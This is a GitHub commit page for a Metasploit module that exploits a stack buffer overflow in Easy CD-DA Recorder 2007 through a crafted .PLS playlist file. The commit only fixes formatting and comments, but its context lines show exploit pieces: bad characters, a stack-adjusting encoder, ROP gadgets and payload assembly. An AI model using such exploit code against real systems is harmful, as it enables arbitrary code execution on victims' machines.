Skip to content

Commit 3f09456

Browse files
author
sgabe
committed
Minor code formatting
1 parent 7fc3511 commit 3f09456

File tree

1 file changed

+4
-4
lines changed

1 file changed

+4
-4
lines changed

modules/exploits/windows/fileformat/easycdda_pls_bof.rb

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -14,11 +14,11 @@ def initialize(info = {})
1414
super(update_info(info,
1515
'Name' => 'Easy CD-DA Recorder PLS Buffer Overflow',
1616
'Description' => %q{
17-
This module exploits a stack-based buffer overflow vulnerability in
17+
This module exploits a stack-based buffer overflow vulnerability in
1818
Easy CD-DA Recorder 2007, caused by a long string in a playlist entry.
1919
By persuading the victim to open a specially-crafted .PLS file, a
2020
remote attacker could execute arbitrary code on the system or cause
21-
the application to crash. This modules has been tested successfully on
21+
the application to crash. This module has been tested successfully on
2222
Windows XP SP3 and Windows 7 SP1.
2323
},
2424
'License' => MSF_LICENSE,
@@ -45,7 +45,7 @@ def initialize(info = {})
4545
'DisableNops' => true,
4646
'BadChars' => "\x0a\x3d",
4747
'Space' => 2454,
48-
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
48+
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # ADD ESP,-3500
4949
},
5050
'Targets' =>
5151
[
@@ -109,7 +109,7 @@ def exploit
109109
sploit << rop_nops(8)
110110
sploit << rop_gadgets
111111
sploit << payload.encoded
112-
sploit << rand_text_alpha_upper(10000) # make it crash
112+
sploit << rand_text_alpha_upper(10000) # Generate exception
113113

114114
# Create the file
115115
print_status("Creating '#{datastore['FILENAME']}' file ...")

0 commit comments

Comments
 (0)